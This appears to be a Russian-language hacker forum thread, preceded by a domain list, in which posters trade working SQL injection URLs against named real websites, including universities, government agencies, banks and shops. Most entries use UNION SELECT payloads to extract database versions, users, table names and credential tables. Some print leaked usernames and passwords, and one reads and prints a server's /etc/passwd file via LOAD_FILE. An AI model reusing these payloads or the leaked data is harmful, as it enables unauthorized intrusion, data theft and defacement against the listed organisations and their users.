www.nasha-strana.ru
www.nb-info.org
www.necin.com.ua
www.neo-market.net
www.nmiqa.com
www.norbekov-minsk.com
www.nosovichi.net
www.nsltrading.com
www.nvrem.dux.ru
www.nw-seniorsonline.org
www.obrienthiele.com
www.ourlastingmemories.com
www.photofestival2007.net
www.phti.org
www.poodle-best.com
www.popkovich.com
www.postcardpolaroid.com
www.pressa.spb.ru
www.razbor.net
www.realtorlist.net
www.roadby.com
www.rwitalianfansclub.com
www.samirkuntar.net
www.sevmashvtuz.ru
www.shary.org
www.sigurdkohn.com
www.simlabs.org
www.sitemix.org
www.sporonositel.com
www.stephenmarkbarchan.com
www.studio317.com
www.tarriverfarms.com
www.tela.dux.ru
www.thistleworthbridgeclub.com
www.truskavec.com.ua
www.urlikov.net
www.voliga.ru
www.volver-lefilm.com
www.vpoprom.ru
www.wagnermartins.net
www.weloveproperties.com
www.werewolf-power.com
www.wittaker-stanley.com
www.worldwarfour.org
www.wubrg.net
www.ya-ru.net
www.yubikai.org
www.yukosgt.com
www.zenru.org

-=WWF зеленые, защитники животных =-

http://www.wwfsa.org.za/print.php?id=506+union+select+1,2,3,4,5,6,concat_w s(0x3a,version(),database(),user()),8,9,10,11,12,1 3+limit+1,1/*

version():4.1.22
database():panda
user():panda@localhost

http://www.wwfsa.org.za/print.php?id=506+union+select+1,2,3,4,5,6,group_co ncat(username,0x3a,password),8,9,10,11,12,13+from+ user+limit+1,1/*

corne:carolYn
xx:akales44

http://avatar.su/avatar_static_ru_id_100x100_avatar.php?id=-1713%20union%20select%201,2,3,4,5,6,7,concat_ws(0x 20,version(),user(%20),database()),9,10,11%20--

4.1.22-log dominator_avatar@10.1.41.13 dominator_avatar

www.binainsan.co.id

http://www.binainsan.co.id/announcement/view_announcement.php?announcementid=192+union+sel ect+1,concat_ws(0x0b,version(),user(),database()), 3,4,5

Версия - 5.0.51a-24+lenny1-log
Юзер - as@localhost
БД - bina

Табличка юзеры

http://www.binainsan.co.id/announcement/view_announcement.php?announcementid=192+union+sel ect+1,concat_ws(0x0b,password,name),3,4,5+from+tbl user


admin ; admin

http://www.outdoormarine.co.za/boat_details.php?id=27+union+select+1,2,concat_ws( 0x3a,version(),database(),user()),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28+limit+1,1/*
version():5.0.32-Debian_7etch10
database():db_outdoormarine
user():outdoorm_1@dedi43.jnb2.host-h.net

http://www.outdoormarine.co.za/boat_details.php?id=27+union+select+1,2,concat_ws( 0x3a,user_id,username,user_password),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28+from+bb_users+limit+1,1/*

В связи с участившимися дефейсами принято решение прекратить выкладывание в этой теме аккаунтов к админкам (включая хеши) Соответствующий пункт правил внесён в первый пост. С сегодняшнего дня , начиная с этого поста
все пароли и хеши будут удаляться, а нарушители наказываться.

Спасибо за внимание

PR 5
http://uzyjwyobrazni.pl/projekt.php?id=170+union+select+concat_ws(version( ),database(),user()),2,3--
Database Version: 4.1.22
Database name: uzyjwyobrazni
User name: uzyjwyobrazni@localhost

http://www.freeflowers.ru/?m=-3+union+select+1,concat_ws(0x3a3a,id,nam,pas1,pas2 ,blk,pay,dat),3+from+cln+/*+&p=77&r=0&g=1


http://xbox-freedom.ru/consoles.php?id=-2'+union+select+1,user(),3,4,5,6,7,8,9,10+--+
z86420_v5@77.221.130.18

http://www.ces-expedition.ru/?module=17&part=single&item=-174+union+select+1,2,3,4,concat_Ws(0x3a3a,FK_ID,FC _LOGIN,FC_PWD,FC_NAME),6,7,8,9,10,11+from+core_use rs+/*+

PR 6

http://informatics.iupui.edu/events/event.php?id=-873'+union+select+1,concat_ws(0x3a,user(),database (),version()),3,4,5,6,7,8,9/*

nm_info@in-info-web1:nm_info:5.0.27-max-log

http://informatics.iupui.edu/events/event.php?id=-873'+union+select+1,group_concat(table_name),3,4,5 ,6,7,8,9+from+information_schema.tables+group+by+t able_schema+limit+1,200/*

faculty,bitrates_flvvideos,pubs,new_semesters,lk_c ountries,events,people_names,new_courses,jobs,semi nars,current_students,page_index,lk_site,informati csdegrees,counties_us,researchareas,newsbytes_arch ive,lk_program,faculty_researchtopics,br_pubs_peop le,recorder,newmedia_projects,lk_course,eventtypes ,people_researchprograms


################################################## ###
PR 5

http://www.biology.uiowa.edu/faculty_info.php?ID=-91'+union+select+1,concat_ws(0x3a,database(),user( ),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/*

website:websiteScript@localhost:5.0.45

tables:

computers,tracking_status,followups,templ_inst_sof tware,dropdown_ram,prefs,dropdown_locations,networ king,computers__ID,users,groups,templates,dropdown _type,software,dropdown_network,networking__ID,con fig,inst_software,tracking,event_log,software_bund les,dropdown_os,networking_ports,devices,comp_grou p,kbarticles,tracking__ID,fasttracktemplates,softw are_licenses,dropdown_processor,networking_wire,dr opdown_iface,kbcategories,policy,section,subpolicy ,handbook,directory,,pwusers,FileTypes,downloads,g oogleipaddresses,Meetings,News,Officers,Resources, Events,seqext2,labmembers,auth_user,seqext7,seqext 3,organism,edits,sequence,seqext4,primers,gene,tax group,seqext5,seqext,has,seqext6

по моему все таблы нужные закрыты :(

http://www.avtoway.ru/news.html?item_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,versi on(),15,16,17,18,19,20,21,22,23+from+information_s chema.tables+--+
5.1.26-rc

http://www.off-road-market.ru/item_view.php?id=&item_id=-2492+union+select+1,2,3,4,5,6,7,8,9,10,11,12,versi on(),14,15,16,17,18+--+
5.1.26-rc

http://www.zababahai.ru/page/news-read.php?news=-12+UnIoN+SeLecT+1,concat_ws(0x3a3a,USER_ID,EMAIL,L EVEL_ID,PASS),3,4,5,6+from+site_user+/*+

http://www.vniikp.ru/info_page.phtml?item_id=-2108+union+select+concat_ws(0x3a3a,login,password) ,2,3,4,5,6+from+admins+--+

http://www.ihd.umkc.edu/read_more.php?id=-136'+union+select+1,2,concat_ws(0x3a,user(),databa se(),version())/*

moddrc@localhost:moddrc:5.0.45

http://www.ihd.umkc.edu/read_more.php?id=-136'+union+select+1,2,group_concat(table_name)+fro m+information_schema.tables+group+by+table_schema+ limit+1,1/*

Support_Group,cms_admin_users,cms_article_rev,cms_ keyword,Fast_Facts,link_report,ms_messages,online_ resources,contact,LibraryCatalog,Video,cms_article ,cms_calendar_data,cms_keyword_category,disibility packets,ms_batch,ms_sent_to,practices_new,Perspect ives,Web,cms_article_category,cms_cat_art_conn,eve nts,ms_link,ms_test_group,sg_dis_link,cms_picture_ storage,Practices,availability,cms_article_hist,cm s_cite,form_submissions,ms_link_log,notes,supportg roup,cms_relevence

##########################################

PR6

http://www.cse.edu/index.php?id=32&no_cache=1&rtype=2&ruid=-36+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14

5.0.67-0ubuntu6:t3_cse:typo3@web1.cse.edu

http://www.cse.edu/index.php?id=32&no_cache=1&rtype=2&ruid=-36+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14+from+information_schema.tabl es+group+by+table_schema+limit+1,x

x= {1,2,3...}
tables:

static_tsconfig_help,tt_news_related_mm,sys_histor y,tx_alumdir_alumni,sys_note,tx_chcforum_forumgrou p,sys_workspace,tt_content,tx_cseteamsched_sports, fe_session_data,tx_impexp_presets,pages_language_o verlay,tx_chcforum_thread,tx_rtehtmlarea_acronym,t x_collegedir_service,be_users,tx_volopp_requestor_ volunteer_opportunities_mm, tt_news,sys_be_shortcuts,tx_admrqst_inforeq,sys_la nguage,tx_chcforum_category,sys_preview,tx_chcforu m_mail_log,tt_address,static_languages,tx_cseteams ched_sports,fe_session_data,tx_impexp_presets,page s_language_overlay,tx_chcforum_thread,tx_rtehtmlar ea_acronym,tx_collegedir_service,be_users,tx_volop p_requestor_volunteer_opportunities_mm

http://crll.gcal.ac.uk/staff_details.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,user(),database(),version()),13,14,15--
crlladmin@localhost:crll:5.0.45-community-nt

http://business-school.exeter.ac.uk/module.php?id=-45+union+select+1,2,3,4,5,concat_ws(0x3a,user(),da tabase(),version()),7,8,9,10,11,12,13,14,15,16,17, 18,19--
sobeadm@snowwhite.ex.ac.uk:sobe:5.0.45-log

http://www.acornhousing.org
http://www.acornhousing.org/TEXT/offices.php?reg=5+UNION+SELECT+0,concat_Ws(0x0b,u ser(),version(),database()),2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24+LIMIT+7,1+--+&
php@localhost
5.0.24a
ahcws

PR: 6


http://www.ipa.ca
http://www.ipa.ca/regions/reg.php?reg=-1+UNION+SELECT+0,1,2,concat_ ws(0x0b,user(),version(),database()),4,5,6,7,8,9,1 0,11,12+--+
ipaca_princess@localhost
5.0.77-community
ipaca_member

PR: 4


http://bancodeimagenscmpa.procempa.com.br
http://bancodeimagenscmpa.procempa.com.br/visualiza.php?codImagem=-8239+UNION+SELECT+0,1,2,3,concat_ws(0x0b,u ser(),version(),database()),5,6,7,8,9,10,11,12,13, 14+--+
bdimgw@LPROWEB.procempa.com.br
4.0.24_Debian-10sarge1-log
bancoimagenscamarapoa

PR: 2


http://www.lafilmo.com
http://www.lafilmo.com/viaje/pagina.php?reg=-8+UNION+SELECT+concat_ws(0x2b,use r(),version(),database()),2,3,4,5,6,7,8
minisivac@localhost
4.1.22-log
minisivac

PR: 6


http://0382.com.ua
http://0382.com.ua/catalog.php?reg=&cat_1=-26'+UNION+SELECT+concat_Ws(0x0b,u ser(),version(),database())+--+
com0382_com0382@localhost
5.1.35-log
com0382_063

PR: 3


http://coe.ulstu.ru
http://coe.ulstu.ru/index.php?reg=main&action=show_new&id=-94+UNION+SELECT+0,concat_Ws(0x0b,user(),version(), dat abase()),2,3,4,5
coe_ulstu_ru@mercury.ulstu.ru
4.1.25-log
coe_ulstu_ru

PR: 3


http://www.amczn.creamax.su
http://www.amczn.creamax.su/reg_view.php?reg=-4+UNION+SELECT+1,concat_Ws(0x0b,user(),version(),d ataba se()),3,4+--+
creamax_amcznb01@fe61.hc.ru
4.1.22-log
wwwcreamaxsu_amcznbase

PR: 4


http://www.liogrand.ru
http://www.liogrand.ru/bron.php?reg=-6'+UNION+SELECT+0,concat_Ws(0x2b,us er(),version(),database()),2,3,4,5,6,7,8,9,10,11,1 2,13+--+&id=366
Uwww3969S@localhost
5.0.81-log
udb3969

PR: 4


http://www.simnet.ru
http://www.simnet.ru/index.php?reg=main&action=st_page&id_page=-20+UNION+SELECT+concat_ws(0x0b,use r(),version(),database()),1
siteadmin@localhost
5.0.45
muci

PR: 2


http://www.alabamaruralaction.com
http://www.alabamaruralaction.com/detail.php?reg=99&com=-99+UNION+SELECT+concat_Ws(0x0b,user(),databas e(),version())+--+
rroenig_arac@76.163.252.90
rroenig_arac
4.1.20-max-log

PR: 2

PR 3
http://www.wheelsandwheelsauto.com/carprofile.php?id=-609+union+select+concat_ws(version(),database(),us er()),2,3--
Database Version: 5.0.74sp1-enterprise-gpl-log
Database name: wheel015
User name: wheel015@216.239.136.38
****************
Нашёл интересную вещь...назвал я это самоDdos :D
http://www.sabou.net/myspace-comments.php?id=-
****************
Вот ещё
http://www.bmdw.org/typo3/sysext/
Стоит на движке typo3. Может кому будет интересно...
****************
Тут меня особо улыбнуло :)
http://www.jcgja.com/index.php?action=content&id=1'
Директории можно просматривать браузером.
****************
http://www.psdpjamaica.com/psdp/index.php?action=content&id=-271+union+select+concat_ws(version(),database(),us er()),2,3,4,5,6,7,8,9--
Database Version: 4.1.8-nt
Database name: psdp
User name: jampro2005@cwj-www12.cwjamaica.com
****************
http://www.serikandi.com/news.php?id=-121+union+select+concat_ws(version(),database(),us er()),2,3,4,5,6--
Database Version: 5.0.77-log
Database name: d60523336
User name: u70583365@cgihost
****************
http://www.fgbmfighana.org/news-events/details.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7,8,9--
Database Version: 4.1.22-log
Database name: 341213_fullgospelcms
User name: 341213_alfred@172.16.10.223
****************
http://www.royalbasinresort.com/page.php?id=-4+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: royalba_db
User name: royalba_user@74.50.85.223
****************
PR 3
http://www.ejobsghana.com/website/about/index.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7,8,9--
Database Version: 4.1.22-log
Database name: 342335_ejobscms
User name: 342335_alfred@172.16.10.220
****************
http://www.cic-ghana.com/cic-ghana/news.php?id=-18+union+select+1,concat_ws(version(),database(),u ser()),3,4,5,6--
Database Version: 5.0.67-community-log
Database name: cic_cicgh
User name: cic_naya@localhost
****************
PR 6
http://www.nab.gov.gh/nabsite/pages/press2.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: nabgov_nab
User name: nabgov_nab@74.50.85.19
****************
PR 6
Школа исследований и аспирантуры, Университет Ганы
http://srgs.ug.edu.gh/annoucement.php?id=-14+union+select+concat_ws(version(),database(),use r()),2--
Database Version: 5.0.32-Debian_7etch6-log
Database name: srgs
User name: root@localhost
****************
http://www.pdaghana.com/page.php?id=-6+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: pdaghan_db
User name: pdaghan_user@216.219.95.52

[PR 6]
http://www.interspaziale.it/firme/articolo.php?id=-20223+union+select+1,2,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user()))),4,5,6,7,8,9,10,11,12, 13,14,15,16
4.1.10-log:internazionale:internazionale@10.10.0.11
====================
[PR 5]
http://www.photocross.ru/gallery/index.php?c=-72+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4
5.0.51a-community:db_photocross2:photocross2@a15.nthosting .ru
====================
[PR 4]
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user())--&scat=25
5.0.77-community:ga_news:venkat@174.120.39.50
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,user,pas sword,file_priv)+from+mysql.user--&scat=25
====================
[PR 1]
http://www.newandusedpalletracking.co.uk/article.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user())
4.1.22:threejc:threejc@localhost

http://dance.sebastopol.ua/showalbum.php?page_code=-9%20union%20select%201,concat_ws(0x3a,version(),da tabase(),user()),3,4,5,6%20%20--

4.0.27-max-log:geokon10:geokon10@v41.valuehost.ru

http://www.sarafalcsrl.com/arataimobil.php?id=-46+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38/*


Database Version: 5.0.45-community-nt
Database name: imobile
User name: soim@localhost

http://www.lemmingtrail.com/t.php?id=110319+and+substring(version(),1,1)=4
----
http://www.eevolute.com/t.php?pageid=1&atid=15&id=14+and+substring(version(),1,1)=5
----
http://map.planetmedalofhonor.gamespy.com/mohaa/t.php?id=82+and+substring(version(),1,1)=4
----
http://www.climatsv.ru/t.php?id=-10+union+select+concat_ws(0x3a,version(),user(),da tabase())
5.0.67-log:u50633@10.10.223.224:u50633
----
http://www.zinesters.net/board/t.php?id=66+and+substring(version(),1,1)=4/*

http://pravo.ruz.net/news/newskom.php3?newsid=-96+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
hardover_pravon:5.0.67-community:hardover_pravo@localhost

//--------------------------------------------//

http://www.bigfootinfo.org/articles/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user())--

bigfootinfo:5.0.67.d7-ourdelta-log:bigfootinfo@68.178.254.169

amigo-bike.ru
http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),d atabase(),version()),8,9,10,11,12,13,14,15,16,17
webadmin@localhost:amigo:5.0.32-Debian_7etch6-log

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(0x2F6574632F7 06173737764),8,9,10,11,12,13,14,15,16,17
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false test:x:1000:1000:test,,,:/home/test:/bin/bash sshd:x:100:65534::/var/run/sshd:/bin/false bind:x:101:104::/var/cache/bind:/bin/false mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false postfix:x:104:106::/var/spool/postfix:/bin/false www-data:x:999:999:www-data:/var/www:/bin/sh avdaemon:x:1001:1001:AVP Daemon:/non/existant:/bin/false avclient:x:1002:1001:AVP Client:/non/existant:/bin/false ftp:x:1003:1003::/tmp:/bin/false kiel:x:1004:1004::/srv/kiel.ru:/bin/false mzbask:x:1005:1005::/srv/mzbask.ru:/bin/false kontrakt-plus:x:1006:1006::/srv/kontrakt-plus.ru:/bin/false universam1:x:1007:1007::/srv/universam1.ru:/bin/false tdzko:x:1008:1008::/srv/tdzko.ru:/bin/false heartsunionru:x:1009:1009::/home/heartsunionru:/bin/flase parus-anapa:x:1010:1010::/home/parus-anapa:/bin/false mailflt3:x:1011:1011:Kaspersky Anti-Spam user:/usr/local/ap-mailfilter3/run:/bin/false misha:x:1012:1012::/home/misha:/bin/sh sasha:x:1013:1013::/home/sasha:/bin/false postgrey:x:110:110::/var/lib/postgrey:/bin/false patrul880:x:1014:1014::/home/patrul880:/bin/false reklama42:x:1015:100::/home/reklama42:/bin/false pressasibiri:x:1016:1015::/home/pressasibiri:/bin/false kemgmli:x:1017:1016::/home/kemgmli:/bin/false postgres:x:1018:1018:,,,:/home/postgres:/bin/bash

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,pas sword),8,9,10,11,12,13,14,15,16,17+from+mysql.user


scooters.moto-bike.ru
http://www.scooters.moto-bike.ru/moto.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6/*
mataru_moto@localhost:mataru_moto:5.0.26-log

www.safariexpo.ru/news/?id=-1+order+by+9/*
www.garms.ru/deps.php?dep=hunt&rid=-1+order+by+2/*
mailbrush, перечитай правила - постить пароли запрещено.

PR 4
http://www.vanguardassurance.com/news-events/newsdetails.php?id=-74+union+select+1,concat_ws(version(),database(),u ser()),3,4,5,6,7,8,9--
Database Version: 4.1.22-standard-log
Database name: 334903_vanguardcms
User name: 334903_alfred@172.16.10.133

http://metropolehaiti.ht/metropole/full_une_fr.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7--
Database Version: 5.0.77-community
Database name: metropol_metropolehaiti
User name: metropol_metropo@localhost

http://www.cohadde.org/about/lecture.php?id=1+union+select+concat_ws(version(), database(),user())--
Database Version: 5.0.75-community-log
Database name: bonzouti_cohadde
User name: bonzouti_goldo@localhost

PR 4
http://www.dmc.ee/byro/showtech.php?id=-1+union+select+1,2,concat_ws(version(),database(), user()),4,5,6--
Database Version: 5.0.81-community
Database name: wdmc_dmc
User name: wdmc_wdmc@localhost

http://www.eestishaping.ee/index.php?site=2&id=-0+union+select+1,2,3,4,5,6,concat_ws(version(),dat abase(),user()),8--
Database Version: 5.1.35
Database name: d9992sd7549
User name: d9992sa12606@z136.zone.ee

http://shans.com.ua/?m=nr&in=212&ir=1&id=-23136+union+select+1,concat_ws(0x3a,version(),user (),database()),3--
5.0.81-log:shansco_igor@second.hosted.in:shansco_shans

http://dhp.com.ua/pers_news.php?id=-21+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8--
5.0.82:admindhp@localhost:dhp

CHAPEL OF THE HIGHLANDS
http://www.chapelofthehighlands.com/ecards/getnewsitem.php?newsid=1+union+select+1,2,concat_w s(0x3a2a3a,version(),database(),user(),@@version_c ompile_os),4,5--
5.0.75-community-log*:*chapelo3_ecards*:*chapelo3_chapel@localhost* :*redhat-linux-gnu

http://www.solmetec.com.ve/ver_producto.php?id=229+union+select+1,concat_ws(0 x3a,version(),database(),user()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16++limit+1,1/*
version():4.1.22-standard
database():solmetec_bd
user():solmetec_web@localhost

http://www.mlauto.ru/cars.htm?carid=-27+union+select+concat_ws(0x3a,database(),version( ),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21--+

Database: mlauto79
Version: 4.0.27-max-log
OS: unknown-freebsd4.7
User: mlauto79@v16.valuehost.ru

http://www.rutka.net/index.php?novica=337&arhiv=0&p=0&komentarji=0&parametri=naj-bo-nasa-rutka-se-boljsa-z-vasimi-prispevki-dragi-instuktorji&ca_m=6&ca_y=2009&id=1+and+substring(version(),1,1)=5

http://www.judaicashuk.com/article.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3--
gordons1_judaicashuk:5.0.75-community-log:gordons1_yarok@localhost

//-----------------------------------------------------------------//

http://www.elsy.com.ua/article.php?cid=4&id=1&l=2+union+select+111,222,333,concat_ws(0x3a,databa se(),version(),user()),555--
elsyvid_elsydata:4.1.22-standard-log:elsyvid_elsyuser@216.240.57.214

//-----------------------------------------------------------------//

http://www.hidglobal.com/article.php?id=1+union+select+concat_ws(0x3a,datab ase(),version(),user()),2--
hidcorp:5.0.51a-log:webUser@ws1.hidglobal.com

http://webmuseum.mit.edu/info.php?&v=1&s=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on()),6,7,8,9,10,11,12,13,14,15+--+&type=exh&t=exhibitions
Mobius@localhost:5.0.41-community-nt
2:admin@mit.mit:<pwd_cutted>

http://webmuseum.mit.edu/grabimg.php?wm=1&kv=-1+union+select+1,'../../grabimg.php'+--+

user.php
$addedterm = strtoupper($field) . " = '" . str_replace("'","\'",$criteria) . "'";

a\' OR EMAIL=0x61646d696e406d69742e6d6974 -- -;asdasd

http://www.tamm-kreiz.com/kalon/tk.php?action=fest&id=20884+and+substring(version(),1,1)=5

http://www.fidelitybank.com.gh/news/details.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9--
4.1.22-standard-log
335104_alfred@172.16.10.133
335104_fidelitycms

http://edmazur.com/bots/bot.php?s=green&id=149754+and+substring(version(),1,1)=5/*
---
http://www.parkweddings.com/park.php?id=1+and+substring(version(),1,1)=4
---
http://www.sitebuildgroup.com/park.php?ID=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4
4.0.27-max-log:sitesf@208.109.78.136:sitesf
---
http://www.parkbrochures.com/park.php?id=-73+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4
5.0.67-log:parkbrochures@minutemaid.dreamhost.com:parkbro chures
---
http://skateparkreview.com/park.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20
4.0.27-max-log:spradmin@208.109.78.141:spradmin

есть таблица users
с полями usernames, password
---
http://www.credonic.com/park.php?a=d&id=-17171+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7,8,9,10,11
5.0.77-COMMUNITY:CREDOMAX_CREDO@LOCALHOST:CREDOMAX_CREDON IC
есть базы: credomax_10000, credomax_2000, credomax_4000, credomax_6000, credomax_8000,
В каждой из них есть табличка: dsp_buyers , из названия понятно что там хранятся покупатели. пароли, почты, имена и так далее, там.
---
http://cityofbartlesville.com/parkcalendar-park.php?cat=1049&event=-1014+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20/*
4.0.27-max-log:pendergraphics@68.178.254.114:pende
---
http://www.nekropolia.pl/park.php?akcja=storyread&id=-71+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4
5.0.75-log:imperio_5@77.55.40.135:imperio_5
таблица user со всеми вытекающими

http://www.ausit.org/eng/showpage.php3?id=650+union+select+concat_ws(0x0a,i d,email,password),2,3+from+members+limit+2,1/*
таблицу к админке не подобрал((
Если получиться - пишите в лс.

http://www.moltravel.nl/park.php?id=22+and+substring(version(),1,1)=5

http://www.windoor.ro/index.php?page=article&id=-31+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3

Version : 4.0.24-log
Database : windoor
User : windoor@localhost
Os : pc-linux-gnu

http://www.aiaccessory.com/part.php?id=-11226+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7
4.0.13:MYSQL0256@webhost1.ch.as12513.net:MYSQL0256
---
http://www.gk-linkor.ru/part.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6
4.1.22-log:gk-linkor_mysql@10.1.22.207:gk_linkor_db
---
http://rusnauka2009.org/part.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10
4.1.22-standard:rusnauk_rusnauk@localhost:rusnauk_biz

http://google.indicateur.biz/index.php3?cat_id=107'+and+substring(version(),1,1 )=4/*
типа гугль))

юзер: indicateur@imu96.infomaniak.ch

http://www.iitis.gliwice.pl/en/laboratory.php?ID=-1)+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4/*
webmaster@localhost:iitis:4.1.11

http://www.tricountyauto.com/part.php?ID=-18+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6
4.0.24-standard:tricount_web@localhost:tricount_db

http://iswebsite.com/part.php?vArticleID=-357+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5
4.1.22-standard:iswebsit_admin@localhost:iswebsit_article

http://www.claudinepisko.be/fr/code/part.php?id=7+and+substring(version(),1,1)=5

http://www.sortecs.ru/comp.php?id=33&idsub=94+union+select+1,2,3,4,5,concat_ws(0x3a,ver sion(),user(),database()),7,8,9,10,11,12,13,14,15, 16/*
4.1.22-log:sortecs2_sortecs@localhost:sortecs2_new

http://www.sctrade.ru/news.php?a=39+union+select+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6/*
4.1.22-standard-log:sctrade_admin@web03.nthost.ru:sctrade_main

http://www.osacorp.ru/content.php?id=27&idsub=-49+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13
5.1.29-rc-log:osacorp@localhost:osacorp_main

http://www.msn-media.ru/docs_view.php?ss=-10+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6
5.0.67-log:msnmedi_admn@web0103.nthost.ru:msnmedi_msn
http://www.m-furnitura.ru/comp.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12
5.0.67:m-furnitura@localhost:m-furnitura
На сайте есть форум, phpbb, Достать акки оттуда проблем не составит :)
правда форум пустой :)

эти сайты, некой Дизайн-студии Patix. Пробежался быстренько по портфолио, все сайты уязвимы.
patix.ru

Сэкс шоп ёпть
www.eros.by
http://www.eros.by/index.php?raz=0&ch=16&prod=703'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,vers ion(),user(),database()),6,7,8,9,10,11,12,13,14,15 ,16,17,18,19--+
5.0.45:h_erotikon@localhost:h_erotikon
в базе ничо интересного =|
ps не подумайте я там не покупал ничо, так мимо проходил :p

http://www.transinsular.net/ver_producto.php?id=999999999999999999+union+selec t+1,2,3,4,5/*

http://www.sealquilatodo.com/ver_producto.php?id=9999999999999999999999999+UNIO N+SELECT+1,2,3,4,CONCAT_WS(0x3a,id,usuario,passwor d,nombre,email),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+FROM+usuarios+limit+0,1--

Шопчег. PR 2.
http://www.hand-ball.net/ver_producto.php?id=-211+union+select+1,version(),3,4,5,6,7,8,9,0,1,12/*

http://www.baladiavalklein.com/english/ver_producto.php?id=-110+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3 ,14/*

http://www.projectitservices.co.uk/case_studies/details.php?id=-11+union+select+1,2,3,4,5--

PR 5.
http://www.coinsportal.ru/News/Details.php?ID=-229+union+select+1,2,version(),4,5,6--

http://vsestanki.ru/tech.php?pid=-306+union+select+1,concat_ws(0x3a3a,id,pass,name,e mail,perm),3,4,5,6,7+from+users+--+
ЗЫ наверно в админке проверка ай пи

http://semya.perm.ru/main/news.php?main=1&nid=-213+union+select+1,username,userpass,4,5,6+from+po ll_user+--+

http://www.painter.perm.ru/gallery_short_work.php?id_artist_work=-2636+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a3a,email,login,pass,viewed),12,13,14+from+artis t+limit+2,1+--+

PR 4.
http://www.calbank.net/newsite/news/details.php?id=-94+union+select+1,version(),3,4,5,6,7,8,9--

PR 4.
http://www.downtownwaukesha.com/member-details.php?ID=-1190+union+select+1,2,3,version(),5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5--

